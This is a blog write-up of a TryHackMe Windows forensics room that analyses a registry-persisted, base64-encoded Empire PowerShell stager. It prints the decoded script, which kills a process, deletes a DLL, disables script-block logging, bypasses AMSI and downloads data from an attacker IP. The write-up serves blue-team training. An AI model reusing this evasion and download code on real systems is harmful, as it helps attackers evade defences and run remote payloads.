Harpocrat3s

My ethical hacking journey

TryHackMe – Investigating Windows 3.x writeup

In Blue team, THM

This is the third room in the Investigating Windows series (there’s the 2.0 room too, which I did but as it was IMHO very poorly done and annoying I didn’t want to spend time in writing a write-up for it). I think that this room was good and definitely helps in practicing some interesting steps in a Windows forensics analysis, but what I did notice is that it was probably going faster in finding some of the answers if I had known Powershell enough to use it to search through logs from the command line.
Powershell is definitely something that I need to pick up at some point, but for now I managed to do just fine without it.

Table of Contents

Scenario

Not much of a scenario provided in this room, just a list of questions to answer by looking at the provided logs (autoruns and process monitor logs).

Investigation

  • What is the registry key with the encoded payload? (full path)

I found this one by looking at the Autoruns logs, I noticed a powershell command with the -enc flag (run by a suspicious “Updater” program with not Description and Publisher).

  • What is the rule name for this run key generated by Sysmon?

In Sysmon we can use Event IDs like 12, 13, or 14 to investigate events related to the Registry.
Looking at events with ID 13 helped me find the needed answer (for this question and the next few ones) .

  • What tactics is classified with this MITRE ATT&CK ID?

  • What was UTC time for the Sysmon event?
  • What was the Sysmon Event ID? Event Type? (answer, answer)

The next 4 questions are answered by decoding the payload of the powershell commannd (partly shown in one of the previous screenshots, the one of the Windows Registry screen):

  • Decode the payload. What service will the payload attempt start?
  • The payload attempts to open a local port. What is the port number?
  • What process does the payload attempt to terminate?
  • What DLL file does the payload attempt to remove? (full path)The payload was an encoded base64 code, which inside had another base64 encoded payload. Decoding both strings and putting them back together gave the overall view of what that script does. 
    # Start the Fax service
sc.exe start Fax

# Set the FTP server and port
$FTPServer = "localhost"
$FTPPort = "9299"

# Create a TCP connection to the FTP server
$tcpConnection = New-Object System.Net.Sockets.TcpClient($FTPServer, $FTPPort)
$tcpStream = $tcpConnection.GetStream()
$reader = New-Object System.IO.StreamReader($tcpStream)
$writer = New-Object System.IO.StreamWriter($tcpStream)
$writer.AutoFlush = $true

# Define a list of commands to send to the FTP server
$commands = @(
    "DQA=",

# --- (start of the second Base64 encoded payload) ---
# Kill the process with the name "FXSSVC"
(Get-Process FXSSVC).Kill()

# Remove the file at 'C:\Windows\System32\ualapi.dll'
Remove-Item -Path 'C:\Windows\System32\ualapi.dll'

# Check if PowerShell version is 3 or higher
if ($PSVersionTable.PSVersion.Major -ge 3) {
    # Get the field 'cachedGroupPolicySettings' from 'System.Management.Automation.Utils' assembly
    $field = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
    
    if ($field) {
        # Get the value of the field
        $cachedSettings = $field.GetValue($null)
        
        if ($cachedSettings['ScriptBlockLogging']) {
            # Disable ScriptBlockLogging and ScriptBlockInvocationLogging
            $cachedSettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
            $cachedSettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
        }
        
        # Create a new dictionary to store settings
        $settings = [Collections.Generic.Dictionary[String,System.Object]]::new()
        $settings.Add('EnableScriptBlockLogging', 0)
        $settings.Add('EnableScriptBlockInvocationLogging', 0)
        
        # Update the registry key 'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' with the new settings
        $cachedSettings['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'] = $settings
    } else {
        # If the field is not found, set 'signatures' field of 'ScriptBlock' class to an empty hash set
        [ScriptBlock].GetField('signatures', 'NonPublic,Static').SetValue($null, (New-Object Collections.Generic.HashSet[String]))
    }
    
    # Disable AMSI (Antimalware Scan Interface) by setting 'amsiInitFailed' field to $true
    $amsiUtils = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')
    $amsiUtils.GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}

# Disable 'Expect: 100-Continue' header for HTTP requests
[System.Net.ServicePointManager]::Expect100Continue = 0

# Create a new WebClient object
$client = New-Object System.Net.WebClient

# Set the User-Agent header
$userAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
$client.Headers.Add('User-Agent', $userAgent)

# Set the proxy configuration
$client.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$client.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$Script:Proxy = $client.Proxy

# Set the request URL and path
$server = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAzADQALgAyADQANQAuADEAMgA4AC4AMQA2ADEAOgA5ADAAMAAxAA=='))
$path = '/admin/get.php'

# Add a Cookie header
$client.Headers.Add('Cookie', 'RjMeek=ZmQLHacMBXrLcB+VElvLcwO26EY=')

# Download data from the server
$data = $client.DownloadData($server +

# --- (end of the second Base64 encoded payload) ---
,
    "DQA="
)

while ($tcpConnection.Connected) {
    while ($tcpStream.DataAvailable) {
        $reader.ReadLine()
    }
    
    if ($tcpConnection.Connected) {
        For ($i = 0; $i -lt 5; $i++) {
            ForEach ($str in $commands) {
                Start-Sleep -Seconds 1
                $command = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($str))
                $writer.WriteLine($command) | Out-Null
            }
        }
        break
    }
}

$reader.Close()
$writer.Close()
$tcpConnection.Close()

    (I think I may have missed a couple of strings while putting back together the two decoded payloads from my notes, but the point was not to provide the entire working code but just to show the relevant information to answer the questions and give an overall feel of what the script does).

  • What is the Windows Event ID associated with this service?
  • What is listed as the New Default Printer?
    To answer these I had to dig around the internet and these logs, probably one of those situations where having the possibility to just search with Powershell in all the logs could have help speed things up, for example using something like this (Out of curiosity, I searched for the command after the investigation):

    Get-WinEvent -ListLog * | findstr “Print”

  • What process is associated with this event?

  • What is the parent PID for the above process?
  • Examine the other processes. What is the PID of the process running the encoded payload?
  • Decode the payload. What is the a visible partial path?
    The answer to this can be found in the above code:
    /admin/get.php
  • This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable? (answer, answer)
    Answering this question required digging around Virus Total, starting with searching the IP address shown in the code, checking the associated malicious file realm.ps1 and then investigating the framework used in this attack, Empire.
    The answer was DefaultProfile, Empire (for some reason, they inverted the expected answers’ order).
  • What other file paths are you likely to find in the logs? (answer, answer)

  • What is the MITRE ATT&CK URI for the attack framework?
    https://attack.mitre.org/software/S0363/
  • What was the FQDN of the attacker machine that the suspicious process connected to?
    ec2-34-245-128-161.eu-west-1.compute.amazonaws.com
    (shown in a previous screenshot, it’s the resolved attacker IP address)
  • What other process connected to the attacker machine?
  • What is the PID for this process?
  • What was the path for the first image loaded for the process identified in Q’s 19 & 20?Finding the answers required searching for the malicious IP through the logs in Event Viewer, then searching for the corresponding PID in the Process Monitos logs. It was Explorer.
  • What Sysmon event was generated between these 2 processes? What is its associated Event ID #? (answer, answer)
  • What is the UTC time for the first event between these 2 processes?
  • What is the value under Date and Time? (MM/DD/YYYY H:MM:SS [AM/PM])
  • What is the first operation listed by the 2nd process starting with the Date and Time from Q25?
  • What is the full registry path that was queried by the attacker to get information about the victim?
  • What is the name of the last module in the stack from this event which had a successful result?
  • Most likely what module within the attack framework was used between the 2 processes?
    Answer to this was on the Mitre Attack website:
  • What is the MITRE ID for this technique?

Conclusion

I certainly enjoyed doing this room, I could practice my Windows forensics skills (also, recently I finished a course on Practical Windows Forensics that gave me enough knowledge and confidence to tackle this room in a quicker way than the previous ones). I recommend it to whoever wants to hone their blue team skills and expand the knowledge about the attack framework Empire, which is widely used.

 

# # # # # # # # # # # # # # # # # #

Related Posts

TryHackMe – Basic Pentesting writeup

TryHackme – Mr. Robot writeup

TryHackMe – Secret Recipe writeup

TryHackMe – Investigating Windows writeup